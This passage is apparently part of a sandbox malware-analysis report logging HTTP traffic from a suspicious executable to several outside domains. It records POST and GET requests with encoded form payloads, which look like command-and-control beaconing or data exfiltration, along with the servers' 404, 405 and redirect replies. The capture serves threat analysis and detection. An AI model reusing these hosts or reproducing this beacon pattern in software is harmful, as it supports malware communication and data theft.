VNlnoZ1pVfgdErhkXnZNephf4dVY [TRUNCATED]
                                                        Jan 10, 2025 20:27:41.215569973 CET1236INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 1251
                                                        date: Fri, 10 Jan 2025 19:27:41 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                        Jan 10, 2025 20:27:41.215641975 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                        Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.104998374.48.143.82806544C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 10, 2025 20:27:43.171972036 CET455OUTGET /mlxg/?KzB47nV=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrU+dJXjaTCQaUtQq1o15v4dK3n1/iEQ==&ity41=G4jxKXr HTTP/1.1
                                                        Host: www.bpgroup.site
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                        Jan 10, 2025 20:27:43.728873014 CET1236INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 1251
                                                        date: Fri, 10 Jan 2025 19:27:43 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                        Jan 10, 2025 20:27:43.728897095 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                        Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.104998413.248.169.48806544C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 10, 2025 20:27:48.790218115 CET722OUTPOST /dash/ HTTP/1.1
                                                        Host: www.fortevision.xyz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.fortevision.xyz
                                                        Referer: http://www.fortevision.xyz/dash/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 196
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                        Data Raw: 4b 7a 42 34 37 6e 56 3d 56 4f 76 68 74 72 41 48 41 55 51 64 69 73 4f 58 5a 4e 4c 6a 63 4b 4b 64 30 73 66 4f 32 4a 42 53 61 48 45 52 32 54 33 63 53 4b 6a 76 52 76 56 67 4a 6c 74 75 45 44 6f 42 51 68 78 31 6f 65 41 68 31 2f 48 4e 33 72 39 50 79 47 59 50 70 6a 59 4f 33 67 4e 50 6a 75 39 6a 55 4a 53 44 44 39 49 32 76 2f 6a 30 2b 35 63 75 78 46 55 2f 75 39 33 69 78 34 71 61 65 65 65 53 58 50 75 50 73 38 68 32 7a 66 66 78 5a 72 57 76 74 63 59 4f 54 33 59 4c 31 65 53 47 79 64 73 7a 65 66 42 36 57 4b 74 37 74 67 70 37 4f 5a 75 2b 4c 2f 69 53 2f 2f 78 4a 78 44 65 37 63 54 4c 63 43 2f 2b 53
                                                        Data Ascii: KzB47nV=VOvhtrAHAUQdisOXZNLjcKKd0sfO2JBSaHER2T3cSKjvRvVgJltuEDoBQhx1oeAh1/HN3r9PyGYPpjYO3gNPju9jUJSDD9I2v/j0+5cuxFU/u93ix4qaeeeSXPuPs8h2zffxZrWvtcYOT3YL1eSGydszefB6WKt7tgp7OZu+L/iS//xJxDe7cTLcC/+S


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.104998513.248.169.48806544C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 10, 2025 20:27:51.333789110 CET746OUTPOST /dash/ HTTP/1.1
                                                        Host: www.fortevision.xyz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.fortevision.xyz
                                                        Referer: http://www.fortevision.xyz/dash/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 220
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                        Data Raw: 4b 7a 42 34 37 6e 56 3d 56 4f 76 68 74 72 41 48 41 55 51 64 68 4d 2b 58 62 75 6a 6a 56 4b 4b 43 77 63 66 4f 34 70 42 65 61 48 41 52 32 58 4f 5a 53 66 7a 76 52 4b 70 67 49 67 42 75 46 44 6f 42 59 42 78 77 33 75 42 76 31 34 50 7a 33 70 35 50 79 47 38 50 70 6d 38 4f 77 54 6c 4f 67 65 39 68 4e 5a 53 57 65 4e 49 32 76 2f 6a 30 2b 39 38 45 78 46 63 2f 75 4a 7a 69 33 74 65 5a 64 65 65 4e 55 50 75 50 6e 63 68 79 7a 66 65 6b 5a 70 75 56 74 65 77 4f 54 32 6f 4c 31 76 53 46 39 64 73 70 41 76 41 78 58 37 41 74 6f 44 6c 75 55 49 4b 6d 5a 4d 2b 63 34 65 4d 4f 67 53 2f 73 50 6b 58 53 4d 35 4c 34 41 57 34 49 5a 6c 74 48 74 5a 44 66 2f 31 53 42 58 35 38 43 44 77 3d 3d
                                                        Data Ascii: KzB47nV=VOvhtrAHAUQdhM+XbujjVKKCwcfO4pBeaHAR2XOZSfzvRKpgIgBuFDoBYBxw3uBv14Pz3p5PyG8Ppm8OwTlOge9hNZSWeNI2v/j0+98ExFc/uJzi3teZdeeNUPuPnchyzfekZpuVtewOT2oL1vSF9dspAvAxX7AtoDluUIKmZM+c4eMOgS/sPkXSM5L4AW4IZltHtZDf/1SBX58CDw==
                                                        Jan 10, 2025 20:27:51.776446104 CET73INHTTP/1.1 405 Method Not Allowed
                                                        content-length: 0
                                                        connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.104998613.248.169.48806544C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 10, 2025 20:27:53.882965088 CET1759OUTPOST /dash/ HTTP/1.1
                                                        Host: www.fortevision.xyz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.fortevision.xyz
                                                        Referer: http://www.fortevision.xyz/dash/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 1232
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                        Data Raw: 4b 7a 42 34 37 6e 56 3d 56 4f 76 68 74 72 41 48 41 55 51 64 68 4d 2b 58 62 75 6a 6a 56 4b 4b 43 77 63 66 4f 34 70 42 65 61 48 41 52 32 58 4f 5a 53 63 54 76 51 2f 6c 67 4a 44 35 75 58 7a 6f 42 53 68 78 78 33 75 42 69 31 2b 6e 4a 33 70 31 31 79 45 30 50 6f 41 67 4f 31 6d 5a 4f 37 4f 39 68 51 4a 54 78 44 39 49 2f 76 38 62 77 2b 35 51 45 78 46 63 2f 75 49 44 69 6d 34 71 5a 62 65 65 53 58 50 75 44 73 38 68 4b 7a 66 58 54 5a 70 72 6f 73 76 51 4f 54 57 34 4c 33 39 36 46 30 64 73 33 42 76 42 78 58 37 4e 7a 6f 46 42 31 55 49 2f 78 5a 4d 47 63 39 37 34 55 30 7a 58 52 61 56 48 77 4a 71 66 53 49 54 73 4b 65 46 6f 6b 6d 4d 44 64 39 55 6e 50 57 59 56 34 55 6e 2f 58 49 73 4b 39 4d 50 42 63 54 74 44 73 42 4e 76 4f 53 46 43 4f 59 35 33 2b 76 51 4d 6b 72 55 46 63 49 5a 39 76 67 48 75 59 4b 46 75 51 79 49 58 41 49 49 55 4c 43 48 72 5a 4d 72 39 4c 6e 4f 53 51 52 6b 31 32 4b 45 6a 6e 44 6f 57 44 4e 2b 51 67 43 4a 46 43 32 45 51 46 4b 77 78 68 43 36 74 6a 41 59 4e 38 79 75 7a 48 78 33 73 44 76 56 4d 34 44 59 59 41 74 41 [TRUNCATED]
                                                        Data Ascii: KzB47nV=VOvhtrAHAUQdhM+XbujjVKKCwcfO4pBeaHAR2XOZScTvQ/lgJD5uXzoBShxx3uBi1+nJ3p11yE0PoAgO1mZO7O9hQJTxD9I/v8bw+5QExFc/uIDim4qZbeeSXPuDs8hKzfXTZprosvQOTW4L396F0ds3BvBxX7NzoFB1UI/xZMGc974U0zXRaVHwJqfSITsKeFokmMDd9UnPWYV4Un/XIsK9MPBcTtDsBNvOSFCOY53+vQMkrUFcIZ9vgHuYKFuQyIXAIIULCHrZMr9LnOSQRk12KEjnDoWDN+QgCJFC2EQFKwxhC6tjAYN8yuzHx3sDvVM4DYYAtAzkL1e8PV0b2qNyQhrB5nAOT/STgXu0imYFG/JZ6aGZZSaaj4zoIjouWp7Dv7YRISiubAdQ+tv46PlbRkYuCwuRTh1+FtRY6wCoGCiwS/CM88l8bd901tN8qo1HW3sWUjIQI35VcEFuQyM6hzyPt/JXQetlw4Ani6HkBzVw0y3S1syDG5P0fyRqd5E4G5ymzNNg6WExHACGJ34Neink4+mqGApMjDg4zao3aetfaOmseesHoq6aryZfk6O6UT9FU85ijwnOzSXpCKqVWxyMYqo7hewY1SwhmvDR1IvopF4j7njzaRrwGiJfJVEWSJZnLLc/q/ucE5Wsthaci/dMkcqt/dzY6gmbWxKinMvSGK/v39Y///tn5t9hxvOfdbo4HlBwW1bAo0N4+RgLx/ismy3cK2YBqCa4i6tuFVKWkQvFe0Z8RcrlVqDQzRY6ASDWulCAPvKyXeDaIOdi74WWyDzW4vT0olIGnvY50Dxxwu/xtayjXW72TBoFslBM0AGIp1jLmKHu+W2Jvb5iIDLD5gGt5fVTuAKLueBCLpKMn3IPx11u3EChcdhbKx4LDzRVwKx7Klq1nkQjuyQERPlPeULLfW5bbtik8eiQ9wQiOKpiRRzo0baqm5QGMiFSCVaptu4GQahItIYmv4eyQG/8tBP7l0V1djkkS6VD [TRUNCATED]
                                                        Jan 10, 2025 20:27:54.325609922 CET73INHTTP/1.1 405 Method Not Allowed
                                                        content-length: 0
                                                        connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.104998713.248.169.48806544C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 10, 2025 20:27:56.421020031 CET458OUTGET /dash/?ity41=G4jxKXr&KzB47nV=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q7rAgUq2fct0m2tHm8/896FICvJPjzg== HTTP/1.1
                                                        Host: www.fortevision.xyz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                        Jan 10, 2025 20:27:56.899673939 CET374INHTTP/1.1 200 OK
                                                        content-type: text/html
                                                        date: Fri, 10 Jan 2025 19:27:56 GMT
                                                        content-length: 253
                                                        connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 69 74 79 34 31 3d 47 34 6a 78 4b 58 72 26 4b 7a 42 34 37 6e 56 3d 59 4d 48 42 75 64 6f 48 49 55 78 48 2b 75 57 4c 5a 71 6a 42 57 4f 4f 65 7a 49 6e 43 7a 36 41 6b 63 6a 41 49 34 6b 75 6a 54 38 79 71 5a 4d 68 38 50 77 64 43 59 68 55 63 58 46 38 48 6d 37 4e 75 77 4a 72 6b 6d 38 31 4b 30 6b 41 58 68 47 77 55 74 78 31 51 37 72 41 67 55 71 32 66 63 74 30 6d 32 74 48 6d 38 2f 38 39 36 46 49 43 76 4a 50 6a 7a 67 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ity41=G4jxKXr&KzB47nV=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q7rAgUq2fct0m2tHm8/896FICvJPjzg=="}</script></head></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.1049988103.21.221.87806544C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 10, 2025 20:28:02.221708059 CET737OUTPOST /mv7p/ HTTP/1.1
                                                        Host: www.rtpterbaruwaktu3.xyz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.rtpterbaruwaktu3.xyz
                                                        Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 196
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                        Data Raw: 4b 7a 42 34 37 6e 56 3d 30 56 4d 37 2f 41 6f 66 64 69 35 4f 61 54 53 53 63 6a 42 30 75 5a 45 6c 38 57 4d 76 4e 42 67 53 6e 38 4a 36 39 6e 45 59 32 46 58 34 68 77 71 44 44 6d 4e 74 6d 56 48 71 34 2b 38 46 59 54 4e 53 31 36 47 2b 45 44 30 72 56 76 74 6e 79 67 77 7a 6b 2b 43 51 4c 34 63 72 4b 5a 6b 70 4c 61 57 78 47 6b 4f 4c 34 53 34 46 70 5a 6b 49 59 65 53 67 2f 38 70 76 2f 58 58 62 32 4f 6f 69 54 5a 45 6c 49 38 52 38 4c 46 4b 66 66 4b 6a 5a 64 6d 4d 4f 49 41 62 49 7a 68 77 34 2f 48 62 4b 6b 2b 63 52 69 79 34 64 56 71 55 43 33 56 4c 39 35 5a 2f 55 45 65 67 33 76 72 48 69 39 70 50 74
                                                        Data Ascii: KzB47nV=0VM7/Aofdi5OaTSScjB0uZEl8WMvNBgSn8J69nEY2FX4hwqDDmNtmVHq4+8FYTNS16G+ED0rVvtnygwzk+CQL4crKZkpLaWxGkOL4S4FpZkIYeSg/8pv/XXb2OoiTZElI8R8LFKffKjZdmMOIAbIzhw4/HbKk+cRiy4dVqUC3VL95Z/UEeg3vrHi9pPt
                                                        Jan 10, 2025 20:28:03.102021933 CET1033INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 796
                                                        date: Fri, 10 Jan 2025 19:28:02 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.1049989103.21.221.87806544C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 10, 2025 20:28:04.950292110 CET761OUTPOST /mv7p/ HTTP/1.1
                                                        Host: www.rtpterbaruwaktu3.xyz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.rtpterbaruwaktu3.xyz
                                                        Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 220
                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                        Data Raw: 4b 7a 42 34 37 6e 56 3d 30 56 4d 37 2f 41 6f 66 64 69 35 4f 61 33 57 53 51 6b 56 30 70 35 45 69 6c 6d 4d 76 58 78 68 62 6e 38 46 36 39 6d 77 49 32 77 2f 34 68 56 57 44 53 53 52 74 6e 56 48 71 67 4f 39 75 58 7a 4d 2f 31 36 4b 49 45 42 67 72 56 76 35 6e 79 68 41 7a 6b 4a 32 52 4a 6f 63 74 42 35 6b 72 54 36 57 78 47 6b 4f 4c 34 53 38 2f 70 66 4d 49 5a 75 69 67 2f 65 42 73 6a 6e 58 45 69 65 6f 69 5a 35 46 75 49 38 52 65 4c 45 57 35 66 49 72 5a 64 6a 6f 4f 49 53 6a 4c 36 68 77 2b 77 6e 61 7a 30 73 39 5a 72 33 46 36 64 4d 45 31 31 58 4c 6e 7a 59 43 54 56 50 42 67 38 63 62 73 7a 76 36 48 62 31 35 44 6c 38 42 4b 34 49 6c 68 54 78 49 67 71 38 65 4f 43 51 3d 3d
                                                        Data Ascii: KzB47nV=0VM7/Aofdi5Oa3WSQkV0p5EilmMvXxhbn8F69mwI2w/4hVWDSSRtnVHqgO9uXzM/16KIEBgrVv5nyhAzkJ2RJoctB5krT6WxGkOL4S8/pfMIZuig/eBsjnXEieoiZ5FuI8ReLEW5fIrZdjoOISjL6hw+wnaz0s9Zr3F6dME11XLnzYCTVPBg8cbszv6Hb15Dl8BK4IlhTxIgq8eOCQ==
                                                        Jan 10, 2025 20:28:05.835823059 CET1033INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 796
                                                        date: Fri, 10 Jan 2025 19:28:05 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 